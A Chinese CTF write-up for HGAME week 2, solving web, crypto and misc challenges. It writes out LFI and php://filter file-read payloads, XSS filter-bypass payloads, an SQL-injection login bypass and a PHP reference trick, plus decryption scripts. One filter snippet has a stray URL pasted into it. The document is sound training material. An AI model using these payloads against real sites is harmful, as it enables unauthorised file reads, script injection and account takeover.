HGAME-WEEK2-WRITE-UP
2018-03-09 13:27
711 查看
HGAME-WEEK2-WRITE-UP
web
Random?
vim在线改代码导致源码泄露。读一下random.php.swp发现关键代码
$emmm =unserialize(serialize($a));if(!is_object( $emmm)) {die("error") ;}$emmm->public = random_int(0,100000000);$emmm->secret=random_int(0,100000000);if($emmm->public == $emmm->secret) {echo $flag;}传入的emmm类的public和secret会赋予随机值。这种情况可以印地址,就可以让他们随机的值是一样的。 class emmm{public $public;public $secret;}$a=new emmm( );$a->secret= &$a->public;echo urlencode(serialize($a)); 传入即可拿到flag
草莓社区-1
简单的LFI,直接?mao=../flag.php拿到flag。
草莓社区-2
还是LFI,利用php伪协议读文件流?mao=php://filter/read=convert.base64-encode/resource=../flag.php
再base64解码一下拿到flag。
XSS-1
看一下过滤:function charge(input) {
input = input.replace(/script/gi, '_');
input = input.replace(/image/gi, '_');
input = ihttp://120.79.189.7/wp-admin/post-new.phpnput.replace(/\(/, '_');
return '<article>' + input+ '</article>';
}
发现可以用img
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<img src=x onerror=alert(1)>
xss-2
看一下过滤function charge(input) {
input = input.replace(/script/gi, '_');
input = input.replace(/img/gi, '_');
input = input.replace(/image/gi, '_');
input = input.replace(/\(/, '_');
input = input.replace(/\>/, '_');
return '<input value="' + input + '" type="text">';
}
可以用html实体编码绕过
" type="image" src="a" onerror="alert(1)
或者使用video标签
">><video src=1 onerror=alert`1`>
最简单的注入
直接万能密码注入用户名admin'#密码随便输
CRYPTO
easy rsa
题目地址: https://pastebin.com/yB5SQdhn matlab解一下方程,直接脚本跑一下贴脚本:
import libnum
from Crypto.Util.number import long_to_bytes
c = 4371976065894333890314975885075127128451240983808800709698046359245834252220415066013588488225793488033803390795656718853587692177687489853479502247266771924035749805299269602527272036788769904108885493823764984982805025952459173246366939243972669582338728034363614943062106220697944193226897767645789368465460202024200438535770983989035642434091720020123447189714932941203953201421143816856602410516207702904806903435163191348277867475813985765685033173827201970396908439360218409562692753257235084893548449865848486681931258855329384534422245333790248671083002562017871712806386748477524316776702973435067495735891
n = 10385112853503545283534594498014002163302819192542881359629016178651814593394538223939733674125477453748418677846543570433509186453439897628509042367641638605796280506469598857872127102183624493512082415420093824666579257184064851925863532407038708153173813845163607930388067232852387553655027755138043051251085946275767001373277444643651026212284925970808939348126454571156523402419571304104957238600724334148041629955456548891850609245486162713434748801968838458008730625275388077430783612116161245037630984479400721315318755404657093206825883572149393481806067157147431981573823960963614146686202457034323040706001
e = 65537
q = 133933997083089702453762501404889177223101226391505098183662564932163520880840961997705471383994176453589438770453090229951122946358812891951990562931866917274839029543379127657118330152316223686977562429606765674161593995316431725070847817817971515410474392037818149046718091344525818647452862614261258250943
p = 77539034746053684621485923427812119975612066379333186124187109849041447728407846098413602773105733428368391023092694065216091918285267572895015826696139841052638816326722407574936479442873205847400304572160883362157525347684671046552636655778287167264844797530347881153376471545728177228869882730086666365807
d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n)
print long_to_bytes(m)
附上一个在线分解大数n的网站 http://factordb.com/index.php
The same simple RSA
使用openssl命令读取pubkey.pem的信息,这题的详解我在我之前的文章《关于openssl命令的一些随笔》中写过了。这里不细讲。Caesar&&Caesar
mnbr firrf ztaii af vx meteq hal jzrvbz zulaq, qhsseey onyicinbh iyvnqío phw ko esflqsee hahxuifhtux rfgskusfn jvxu lzs somoii tbcd omd tb rbzgfvrf bji. rt gvta xzmr atjsedb ktz e miyztni ff
gkxuxp aqcul lfufsl, iyzlg cg alv bnbd vj r rvjxy sw cysty artrf moek rnb tsseg n pxk sw pbzbzlvd
fhhuij, wuwvo avrr kapxv aar xusimbil, smbe cfxomjtbfbj ixgf. hal afryr phw jo esvlrk tuom teey
gvbukj lnqdlh eazsl, hru ia ckkii tb wgkmtags moid ig ktz rvcrglhvp tb dhprk. eiskf cvae rnymeg gvx
tsetu cy teicu o yhqzll cy yexgrr zftjirg pvycd fsm bt khrwk aietf bxhv khr jbsprgr, ogk aztu o zyirt
hdkvei os dbwij aar dlxklrrkbqj tusr dsllq rbztcal bxd mevrbmpses. swkzx khrm uyslguh moi datbxa.
e yenjr ncgsl kbal rn hbmhqvd ostyh rnq gihvioj vtuhj, wuc buxioqivlh yizgxsj rs zsexyírdrg,
ibx fn n phsh guozbj hvmbblavrtvcg vj nhnh al lzmfsem grlysw alv evuaal noarxy sw tus eleinrr tsgyezwlaw
ff zovlhfnvo.
维吉尼亚解密。这里附上一个在线爆破维吉尼亚的网站。 https://www.guballa.de/vigenere-solver
violence
贴一下题目:a = ?b = ?m = ?flag = "hgame{" + m + "}"cipher = ''for i in m:if96<ord(i) <123:cipher += chr(a * (ord(i) + b - 97) % 26)else:cipher += iprint cipher.encode('hex')# https://www.wikiwand.com/en/Affine_cipher flag是一个有意义的句子# cipher = 1917090506070905195f07065f06031505195f035f0a07065f170c5f1407170205101105 典型的仿射加密,爆破一下ab。 解密脚本:import gmpy2a = [1, 3, 5, 7, 9, 11, 15, 17, 19, 21, 23, 25]c = '1917090506070905195f07065f06031505195f035f0a07065f170c5f1407170205101105'.decode('hex')c = list(c)def dec(a, b, c):m = ''for k in c:if96<ord(k) +97<123:m += chr((a * (ord(k) - b) % 26) + 97)else:m += km = m.split('_')if m[3] =='a'or m[3] =='i':print mfor i in a:for j inrange(1, 27):dec(int(gmpy2.invert(i, 26)), j, c)
xasr
没搞出来。misc
咻咻咻
打开压缩包发现没密码。那可能就是zip伪加密了。
解压出来发现是一个wav文件。那可能是wav的LSB隐写。github上找脚本。
https://ethackal.github.io/2015/10/05/derbycon-ctf-wav-steganography/
需要Ruby环境
Base64,解码得flag。
White cosmos
发现是16进制09和20,上次pwnhub密码学专场做了一个类似的(还被我拿到了pwnhub邀请码233333),不过不知道为啥这次我拿我脚本跑不出来了,后来才发现直接转16进制,再转字符串就行了。只要把09和20分别替换成0和1就行直接贴解密脚本:
# !/usr/bin/python # coding=utf-8 s='09092009 20202020 09092020 09090920 09092020 20200920 09092009 09200920 09092020 09200920 09090909 20090920 09200920 09090920 09092020 09200920 09092009 09202020 09092020 20090920 20090920 20202020 09092009 09200920 09092020 09200920 9a68 09200909 09090920 20090920 20092020 09200909 09090920 09200920 09090920 09092009 20202020 09202009 20200920 09090920 09202020 09092020 09200920 09200909 09090920 09090920 20090920 09090920 20202020 20090920 09202020 09092020 20090920 09092020 09200920 09090909 092009' temp = ((s.replace('09','1')).replace('20', '0')).split() temp = "".join(temp) print hex(int(temp,2))
easy password
给出密码是小写字母和数字了,直接爆破压缩包密码。得flag。mysterious file header
发现是class文件,拿DJ Java Decompiler反编译出java代码。/* * Decompiled with CFR 0_123. */ package GUI; import java.awt.Component; import java.awt.GridLayout; import java.awt.LayoutManager; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; import javax.swing.JButton; import javax.swing.JFrame; import javax.swing.JPanel; import javax.swing.JTextArea; public class hgameGUI extends JFrame { private static final int DEFAULT_WIDTH = 300; private static final int DEFAULT_HEIGHT = 200; public hgameGUI() { super("Welcome to Hgame!"); this.setSize(300, 200); JButton flag1 = new JButton("i'm flag"); JButton flag2 = new JButton("i'm flag, too."); JButton flag3 = new JButton("RU kidding me? I'm the true flag!"); JButton flag4 = new JButton("UR wrong, I'm the true flag!"); JTextArea flagtext = new JTextArea("Want flag? Try upstairs."); JPanel flag = new JPanel(); flag.setLayout(new GridLayout(5, 1)); flag.add(flag1); flag.add(flag2); flag.add(flag3); flag.add(flag4); flag.add(flagtext); flag1.addActionListener(event -> { flagtext.setText("118"); } ); flag2.addActionListener(event -> { flagtext.setText("54"); } ); flag3.addActionListener(event -> { flagtext.setText("29"); } ); flag4.addActionListener(event -> { flagtext.setText("89"); } ); this.add(flag); } } |
最后在118.29.89.54里面找到flag。
week2 over!
相关文章推荐
- HGAME-WEEK1-WRITE-UP
- week 3th、run and write CLI case in CAFE with Simulator
- 南京邮电大学攻防平台 逆向writeup
- 0ctf flagen writeup
- IDF实验室-部分简单题目writeup
- IDF-CTF-牛刀小试 writeup
- Writeup for 0CTF2017 web
- I春秋360_Reverse_登山_Writeup
- [Bugku]密码???[writeup]
- Bandit Wargame Level18 Writeup(interactive shell and .bashrc )
- ISCC2017 Web write up
- 看雪CTF2017第二题lelfeiCM的writeup
- CTF writeup:tomcat上传webshell后门
- CCTF重邮(绿盟)杯_部分解密题WriteUp
- pwnable.tw calc writeup
- 【4.29安恒杯】writeup
- SQLZOO(SELECT within SELECT Tutorial)Writeup
- Protostar Format Write Up
- pwnable.kr fsb writeup
- NCTF 南京邮电大学网络攻防训练平台 WriteUp